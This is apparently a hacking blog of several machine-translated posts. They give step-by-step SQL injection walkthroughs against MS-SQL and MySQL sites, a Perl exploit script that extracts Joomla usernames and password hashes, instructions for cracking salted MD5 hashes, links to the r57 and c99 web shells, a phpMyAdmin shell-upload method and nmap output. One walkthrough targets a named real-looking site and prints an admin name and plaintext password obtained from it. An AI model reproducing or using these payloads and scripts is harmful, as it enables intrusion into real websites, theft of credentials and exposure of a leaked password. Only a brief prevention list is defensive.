MS SQL Injection, step by step

Lately, you often hear the term "SQL Injection"?
You know how dangerous this bug?
we will present step by step is SQL Injection.
Note: we will restrict the discussion on SQL Injection in MS-SQL Server.
We'll take the example of site-www.pln wilkaltim.co.id
There are two drawbacks to this site, namely:
1. Tabel News
2. Tabel Admin

The first step, we determine that the holes can be injected with a walk (Enumeration) they will be used on site.
We will find a way 2 model input parameters, namely by entering input through the box and put it through the URL address.

We take the easiest first, by way of the input box. Then we search box for admin login. Www.pln-wilkaltim.co.id/sipm/admin/admin.asp found the first step to determining the table name and fieldnya, we inject NIP box with the command (password is up to you):
' having 1=1--
do not forget to write the single quotes and double hyphens (important). The second meaning can be a sign they will see www.neoteker.or.id SQL Injection tutorial. Then will come out error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Come out of our first field name
Note the name table : T_ADMIN
Note the name field : NOMOR

Then we will find the next field name, along with a table name may be different.
We injected NIP box (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
means that the table names and second our field
record : T_ADMIN.NIP

then we find the third our field
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
record the third table : T_ADMIN.PASSWORD

do the steps above until we find the last field
Here is the error message occurs, if we check the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(notes the sentence should not be cut line)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We successfully managed to find the last field.
list column (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL

There is only one table for this authentication (ie T_ADMIN),
this will make it easier for our process.

The next step, we determine the structure of the areas mentioned above.

we inject in the box (pass up to you):
' union select sum(NOMOR) from T_ADMIN--

The meaning of the query is: we try to apply the sum clause before determining whether the number of columns in two similar rowsets.
Our language is easy to insert a clause sum (amount) applies to numeric column types, so for typing non-numeric columns, will be out errors that can tell us on the relevant column.
Error message
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
means that the next column type is numeric
next we inject:
' union select sum(NIP) from T_ADMIN--
going out error messages
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
means that NIP column type is char

We must repeat the above command to the next column by replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column we get the column type
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step, we will search the contents of the password field, for the user admin, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
means we choose the minimum user name greater than 'a' and try to turn it into type integer. Meaning the number 1 as 6 times it is that we only choose the NAME column, and ignore the other columns 6.
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
you see:
varchar value 'bill '
'bill' is the name of the user in the last record entered, or the NAMA column in the last record inserted..

next, we inject"
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
notes: to row
Going out error messages:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
means we are successful
we get
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

please login to:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account, is a branch, please fill yourself with trial and error

or we just use the shortcut

we inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
notes: to row

Directly to the admin menu.
Remember: do not make mischief! send admin!


he second hole in the news. There are basically news content from another table.
So can we inject tetep! The difference is, we must enter the parameters in its URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
there are parameters id and idSM
when we try to inject it influential is the parameter id

we inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
Going out error messages:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
means that 'tb_news.NewsId' is first our table n colomn
We repeat the steps above to get
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, next is your own work to develop your knowledge.
You can enter the word that you can determine their own content.
This is why the holes in MS-SQL Server is very dangerous.

=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
========================================
Common prevention strategies used
1. Limit the length of the input box (if possible), by limiting the source code, so a cracker beginners will be confused for a moment to see her input box can not be injected with a long command.
2. Filter input is entered by the user, especially the use of single quotes (Input Validation).
3. Turn off or hide error messages from SQL Server is running.
4. turn off the standard facilities such as Stored Procedures, Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Well it might be what I can tell .....
This is a picture, how the Internet is not secure ...
If you want more secure, off your network cable, disk drives off, from your hard drive, you kompie sale!
Just kidding )

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Read More......

My SQL Injection Step by Step

SQL injection is a hacking action performed in the client application by modifying the SQL command that already exists in memory and is clien application techniques that exploit web applications using the database for data storage.

that needs to know before the mysql sql injection:
charakter: ‘ or -
comments: /* or –
information_schema for versi: mysql version 5.x , not support for mysql version 4.x

===========
=Firts step:=
===========

find a target
example: [site]/berita.php?id=100

add Charakter ‘ at the end of url or add charakter “-” to see if there is an error message.
example: [site]/berita.php?id=100′ or
[site]/berita.php?id=-100

so the error message

==========
=Second step:=
==========

find and count the number of tables contained in the database ...
use the command : order by

example: [site]/berita.php?id=-100+order+by+1– or
[site]/berita.php?id=-100+order+by+1/*

check one by one ...
example: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

until error or missing error message…
example: [site]/berita.php?id=-100+order+by+9–

means that we take is until number 8
become [site]/berita.php?id=-100+order+by+8–

===========
=Third step:=
===========

to issue what number appears, use command union
because error until number 9
so: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

suppose that the outcome is number 5

use command version() or @@version to check version of sql that used input command in the numbers out last reply
example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

see the version used replies, if left alone version 4 for this version of our own 4 column table and figure imaginable on the web because they can not use the command From+Information_schema..

to version 5 then you are lucky not to have to guess n table columns such as version 4 version because in version 5 we can use the command From+Information_schema..

============
=Fourth step:=
============

to display the table thereis on the web is
command: table_name >>> included in the figures out last reply
command: +from+information_schema.tables/* >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

example: table that appears is “admin”

===========
=Fifth step:=
===========

to display all the contents of the table, the command is
command: group_concat(table_name) >>> included in the figures out last reply
command: +from+information_schema.tables+where+table_schema=database() >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> included in the figures out last reply
command: +from+information_schema.columns+where+table_name=0xhexa– >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

at this stage you are required to take the contents of the table to hexadecimal that is by way of converting your website is used for conversion reply :

www.ascii-convert.co.cc

For example words of compassion in the conversion of the admin will be 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0×61646D696E–

============
=Seventh step:=
============

to make what were formerly excluded from the table that is the way

command: concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> included in the figures out last reply
command: +from+(nama table berasal) >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)–

examples of words that came out was id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin–

==============
= Eighth step:=
==============

Last step search admin page or login

then up to you because the web of power in your hands

Read More......

Various famous shell injection

Maybe some of you do not know what it shell injection.Shell injection is a script that we put on the target server which is the entrance for us to master server. With the shell we can see the contents of the database server, which is binding, even we can get an interactive shell that will be used for rooting. This shell can be run on linux and windows systems and commands we adjust the target OS.
The following is a screenshot of the shell injection

r57 shell
Download r57shell here



c99shell
Download c99shell here



c100shell
Download c100shell here




Read More......

My Ubuntu...

This is the latest display of the Linux Ubuntu 8.10 which I use for Hacking ..
more cool and scary look ...


My Desktop



My Mozilla


Read More......

Upload Shell on phpMyAdmin

Greetings all ....
for those who already know this trick, i am sorry ...
there may be some colleagues - colleagues who do not know ...

PhpMyAdmin should be protected with a password, but still there are some web leave the default (no password), n we can use ...

Here I will show you how to upload shell on the localhost
we will create a form called form.php n upload a file called upload.php that allows you to upload a shell we will ....

First we must know the path of its document root
Picture 1


then we go into phpmyadmin to create a database
Picture 2.


the picture above we create a database called the shell in the text box "Create new database". After that, select the database called the shell n select the SQL tab, and enter the SQL Comment. Command below will create a table called the form and will create a file called form.php on DOCUMENT ROOT, in which the file will contain the html codes.
Like Picture 3


and if no errors will successfully create a file called form.php in the DOCUMENT ROOT
Picture 4.


Once we make these forms, then we must create a file uploader ....
Command below will create a table called upload and will create a file called upload.php in the DOCUMENT ROOT, in which the file will contain the form php codes
like Picture 5


and if no errors will successfully create a file called upload.php in the DOCUMENT ROOT
Picture 6.


After sekses, we lived was called form.php file there DOCUMENT ROOT, and the example is http://localhost/form.php
Picture 7.


We live to upload a shell to be placed on the web, for example, I will upload a shell, and if successful, would bring a blank page and the URL that points to a file called "upload.php". on my localhost pointing to http://localhost/upload.php
Like Picture 8.


This is an example of fruitful shell uplaod to my localhost server ..
Picture 9.


for his script and shell please download at
http://www.ziddu.com/download/8112213/upload_shell_on_phpmyadmin.zip.html

so first apologize if there are errors
Please corrected
Thanks

Read More......

Hacking sites

There are many sites that provide information for Hacking activities in this world. Maybe this is some of them ...


http://milw0rm.com/



http://www.securityfocus.com/



http://darkc0de.com/



http://www.darkmindz.com/



http://www.jasakom.com/



http://www.kecoak-elektronik.net/log/


From several sites on we will get a lot of information and hacking techniques ...
hopefully helpful...

Read More......

encryption Password Joomla

Joomla has implemented a model called md5salt encryption.
example is faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

hash was found in the first part of faae726c2d28d65735ba190c5b249e54, nd salt was there at the end G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A, they appear on separate them with a colon ":"
Salt for the attacker works to assist in finding the actual password.
Found here is if the password in plain text form saltnya join it will generate a password hash joomla. in other words, if : x + salt = hash joomla. so that if implemented through encryption md5 :

md5(x + salt) = hash
so :
md5(x + G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A) = faae726c2d28d65735ba190c5b249e54

for crack it, we use a dictionary dictionary tool that can be downloaded at
http://www.ziddu.com/download/8111597/brute.zip.html

congratulations to crack passwords joomla and good luck ....



Read More......

Simple Script SQL Injection joomla

This is a simple joomla SQL Injection can create md5 passwords and form md5salt and we can determine how many rows from the table jos_user ...

!/usr/bin/perl -w
print "\t\t###############################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t###############################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] .
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."
+LIMIT+".$ARGV[1].",1--";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /(.*?)/){
print "\n[+] Username : $1";
}
if ($answer =~/(.*?)/){
print "\n[+] password : $1\n\n";
print "\t\t# berhasil #\n\n";}
else{print "\n[-] gagal...\n";}

needs to be done is to determine the number of existing colom and how the numbers appear
example :
1. target is http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. many colomns are 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. number appears is 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--

then you can use it
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
notes :
joomla.pl ==>name of file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==>joomla have vulnerability
'0' ==>first row from tabel jos_user, for second replace with '1', and so on

if successful it will be like this

###################################################

# Joomla SQL Injection #


###################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

now living to crack md salt

or you can download that script here
http://www.ziddu.com/download/8111490/joomla.zip.html

Read More......

Scaning the web with nmap

Nmap is a very powerful tool to find port, service and operating system used by the server.
From the nmap information we can get a lot of information.
Here I'll show you several ways using nmap, you can combine existing orders in accordance with nmap your creativity ..

Here I will try to scan localhost

root@hack-ngelih:/home/hack# nmap Aggressive -A -v -O 127.0.0.1

Starting Nmap 4.85BETA7 ( http://nmap.org ) at 2009-06-13 10:24 WIT
Failed to resolve given hostname/IP: Aggressive. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges
Initiating SYN Stealth Scan at 10:24
Scanning localhost (127.0.0.1) [1000 ports]
Discovered open port 443/tcp on 127.0.0.1
Discovered open port 3306/tcp on 127.0.0.1
Discovered open port 80/tcp on 127.0.0.1
Discovered open port 21/tcp on 127.0.0.1
Discovered open port 631/tcp on 127.0.0.1
Completed SYN Stealth Scan at 10:24, 0.04s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 5 services on localhost (127.0.0.1)
Completed Service scan at 10:24, 12.22s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against localhost (127.0.0.1)
NSE: Initiating script scanning.
Initiating NSE at 10:24
Completed NSE at 10:24, 5.08s elapsed
Host localhost (127.0.0.1) is up (0.000045s latency).
Interesting ports on localhost (127.0.0.1):
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.2.11
|_ html-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.11
|_ sslv2: server still supports SSLv2
|_ html-title: Site doesn't have a title (text/html).
631/tcp open ipp CUPS 1.3.7
3306/tcp open mysql MySQL 5.1.30
| mysql-info: Protocol: 10
| Version: 5.1.30
| Thread ID: 12
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_ Salt: ~Bm~R][405X
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.17 - 2.6.27
Uptime guess: 0.149 days (since Sat Jun 13 06:50:30 2009)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.26 seconds
Raw packets sent: 1019 (45.598KB) | Rcvd: 2046 (87.120KB)
root@hack-ngelih:/home/hack#


seen that the port is open is above average command 21,80,443,631,3306 aggressive scan host 127.0.0.1 and to know who uses Linux OS 2.6.x.
The above command is also used for adding a TCP SYN-sS

please expan...


Read More......
Powered by NGELIH